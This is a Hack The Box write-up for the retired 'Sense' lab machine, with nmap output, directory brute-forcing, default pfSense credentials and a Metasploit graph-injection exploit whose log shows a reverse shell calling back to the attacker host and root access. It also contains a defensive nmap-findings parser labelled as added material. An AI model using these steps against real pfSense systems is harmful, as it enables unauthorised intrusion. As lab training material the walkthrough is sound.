
Welcome to my write-up for Hack The Box – Sense (with Metasploit).
This is my first published write-up, and it does not have much content, as it was such an easy machine to complete, I have to say...
I only recently started taking notes on my machine/box completions for publishing write-ups, and I have really started to enjoy doing it. The majority of my completed write-ups are for machines that are still active, which means I am unfortunately not allowed to upload those write-ups as of yet.
#Sadface

A little back story: I am a freelance creative, I do photography and videography, and I started to get really interested and hands-on in cyber-security in 2019.
I am an autodidact from the 80's, and I have never felt more passionate about learning something new than with cyber-security, not since I started creating images back in the early 2010's. There is something refreshing about learning something you always wanted to do which is also very far from the thing that you currently do.
I am active on HackTheBox and TryHackMe, and I am aiming to give the OSCP exam a shot before the end of this year.
Thank you for sticking with me this far!
Without further ado, here is my plain write-up for Sense, a machine which can be found at https://app.hackthebox.eu/machines/Sense.
Sense was a Retired machine at the time of this writing.
What I have learned with this machine:
- Always check .txt files and source code.
- Sometimes things are easier than you think...
- Injection :).
Here We Go!
First we start with some basic enumeration:
NMAP:
Starting Nmap 7.91 ( <https://nmap.org> ) at 2021-04-21 10:31 CEST
NSE: Loaded 149 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:31
NSE Timing: About 40.91% done; ETC: 10:32 (0:00:48 remaining)
Completed NSE at 10:31, 34.95s elapsed
Initiating NSE at 10:31
Completed NSE at 10:31, 0.00s elapsed
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Initiating Ping Scan at 10:31
Scanning 10.10.10.60 [4 ports]
Completed Ping Scan at 10:31, 0.08s elapsed (1 total hosts)
Initiating Connect Scan at 10:31
Scanning sense.htb (10.10.10.60) [65535 ports]
Discovered open port 80/tcp on 10.10.10.60
Discovered open port 443/tcp on 10.10.10.60
Connect Scan Timing: About 19.74% done; ETC: 10:34 (0:02:06 remaining)
Connect Scan Timing: About 48.01% done; ETC: 10:33 (0:01:06 remaining)
Completed Connect Scan at 10:33, 104.52s elapsed (65535 total ports)
Initiating Service scan at 10:33
Scanning 2 services on sense.htb (10.10.10.60)
Completed Service scan at 10:33, 6.14s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against sense.htb (10.10.10.60)
Retrying OS detection (try #2) against sense.htb (10.10.10.60)
Initiating Traceroute at 10:33
Completed Traceroute at 10:33, 0.05s elapsed
Initiating Parallel DNS resolution of 1 host. at 10:33
Completed Parallel DNS resolution of 1 host. at 10:33, 0.04s elapsed
NSE: Script scanning 10.10.10.60.
Initiating NSE at 10:33
Completed NSE at 10:34, 70.88s elapsed
Initiating NSE at 10:34
Completed NSE at 10:35, 15.50s elapsed
Nmap scan report for sense.htb (10.10.10.60)
Host is up (0.034s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.35
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: lighttpd/1.4.35
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| lighttpd 1.4.35:
| CVE-2019-11072 7.5 <https://vulners.com/cve/CVE-2019-11072>
| CVE-2018-19052 5.0 <https://vulners.com/cve/CVE-2018-19052>
|_ CVE-2015-3200 5.0 <https://vulners.com/cve/CVE-2015-3200>
443/tcp open ssl/https?
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
| ssl-ccs-injection:
| VULNERABLE:
| SSL/TLS MITM vulnerability (CCS Injection)
| State: VULNERABLE
| Risk factor: High
| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
| does not properly restrict processing of ChangeCipherSpec messages,
| which allows man-in-the-middle attackers to trigger use of a zero
| length master key in certain OpenSSL-to-OpenSSL communications, and
| consequently hijack sessions or obtain sensitive information, via
| a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
| References:
| <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224>
| <http://www.cvedetails.com/cve/2014-0224>
|_ <http://www.openssl.org/news/secadv_20140605.txt>
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
| Modulus Type: Non-safe prime
| Modulus Source: RFC5114/1024-bit DSA group with 160-bit prime order subgroup
| Modulus Length: 1024
| Generator Length: 1024
| Public Key Length: 1024
| References:
|_ <https://weakdh.org>
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: BID:70574 CVE:CVE-2014-3566
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
| References:
| <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566>
| <https://www.imperialviolet.org/2014/10/14/poodle.html>
| <https://www.securityfocus.com/bid/70574>
|_ <https://www.openssl.org/~bodo/ssl-poodle.pdf>
|_sslv2-drown:
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose
Running (JUST GUESSING): Comau embedded (92%), OpenBSD 4.X (86%), FreeBSD 8.X (85%)
OS CPE: cpe:/o:openbsd:openbsd:4.0 cpe:/o:freebsd:freebsd:8.1
Aggressive OS guesses: Comau C4G robot control unit (92%), OpenBSD 4.0 (86%), FreeBSD 8.1 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.001 days (since Wed Apr 21 10:33:34 2021)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Randomized
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 36.99 ms 10.10.14.1
2 34.12 ms sense.htb (10.10.10.60)
NSE: Script Post-scanning.
Initiating NSE at 10:35
Completed NSE at 10:35, 0.00s elapsed
Initiating NSE at 10:35
Completed NSE at 10:35, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 237.06 seconds
Raw packets sent: 91 (7.552KB) | Rcvd: 318 (75.152KB
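The scan above reports three confirmed TLS weaknesses on port 443 (CCS Injection, a 1024-bit DH group, POODLE) buried in a lot of noise. As an added example that is not part of the original write-up, here is a small triage parser for nmap's normal-output NSE blocks: it keeps only the script blocks that actually reached "State: VULNERABLE" and collects the CVE ids they cite, so a defender can prioritise fixes rather than re-reading the whole report. The sample input is a constructed excerpt in nmap's layout using only the scripts and CVE ids shown in the scan above.

```python
import re
from dataclasses import dataclass, field

# Constructed excerpt in nmap's normal-output layout, trimmed from the scan above.
SAMPLE_NMAP = """\
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.35
443/tcp open ssl/https?
| ssl-ccs-injection:
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
| ssl-dh-params:
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
| ssl-poodle:
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  BID:70574  CVE:CVE-2014-3566
|_sslv2-drown:
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)")       # "443/tcp open ssl/https?"
SCRIPT_RE = re.compile(r"^\|_?\s?([a-z][a-z0-9-]*):\s*$")     # "| ssl-poodle:" / "|_sslv2-drown:"
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")

@dataclass
class Finding:
    port: str
    script: str
    title: str = ""
    vulnerable: bool = False
    cves: list = field(default_factory=list)

def parse_nse_findings(text):
    # One Finding per NSE script block; only blocks that say "State: VULNERABLE" are returned.
    scripts, port, cur, want_title = [], None, None, False
    for raw in text.splitlines():
        if m := PORT_RE.match(raw):
            port, cur = f"{m.group(1)}/{m.group(2)}", None
        elif m := SCRIPT_RE.match(raw):
            cur, want_title = Finding(port, m.group(1)), False
            scripts.append(cur)
        elif cur is not None and raw.startswith("|"):
            body = raw.lstrip("|_ ").strip()
            if body == "VULNERABLE:":
                want_title = True            # the next non-empty line names the issue
            elif want_title and body:
                cur.title, want_title = body, False
            elif body == "State: VULNERABLE":
                cur.vulnerable = True
            cur.cves += [c for c in CVE_RE.findall(body) if c not in cur.cves]
    return [f for f in scripts if f.vulnerable]
```

Scripts that produce no "State: VULNERABLE" line (like sslv2-drown here, or the version-based vulners list on port 80) are deliberately left out, since they are not confirmed findings.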
At the same time I have DirBuster running to brute-force some directories:

DirBuster gave us an interesting .txt file called /system-users.txt, at http://10.10.10.60/system-users.txt:

Sweet, let us log in! You can find the default credentials for pfSense online with some Google-fu!

Now that we can see the version info and we have some login credentials, let us check msfconsole to see if we get a hit.
❯ msfconsole
# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ metasploit v6.0.38-dev ]
+ -- --=[ 2118 exploits - 1138 auxiliary - 358 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: When in a module, use back to go
back to the top level prompt
msf6 > search pfsense
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/http/pfsense_clickjacking 2017-11-21 normal No Clickjacking Vulnerability In CSRF Error Page pfSense
1 exploit/unix/http/pfsense_graph_injection_exec 2016-04-18 excellent No pfSense authenticated graph status RCE
2 exploit/unix/http/pfsense_group_member_exec 2017-11-06 excellent Yes pfSense authenticated group member RCE
Interact with a module by name or index. For example info 2, use 2 or use exploit/unix/http/pfsense_group_member_exec
Going through the website I can see a graph viewer, RRD Graphs, under the dropdown menu called Status.
So we will use 1: exploit/unix/http/pfsense_graph_injection_exec
We fill in the options with the info we have, including changing USERNAME to Rohit, the user we found in the .txt file earlier.
[*] Started reverse TCP handler on 10.10.14.15:4445
[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload
[*] Payload uploaded successfully, executing
[*] Sending stage (39282 bytes) to 10.10.10.60
[+] Deleted nsh
[*] Meterpreter session 1 opened (10.10.14.15:4445 -> 10.10.10.60:45243) at 2021-04-21 11:01:53 +0200
And for some reason we are root! The user and root flags are up for grabs at their regular locations!!

If you have any questions I will answer them as best as I can, when I can.
I hope you enjoyed this little write-up and I will see you on the next one!
Have a great day! ❤
Signing off,
Yours Truly
Get an email whenever n3pp13 publishes. https://n3pp13.medium.com/subscribe
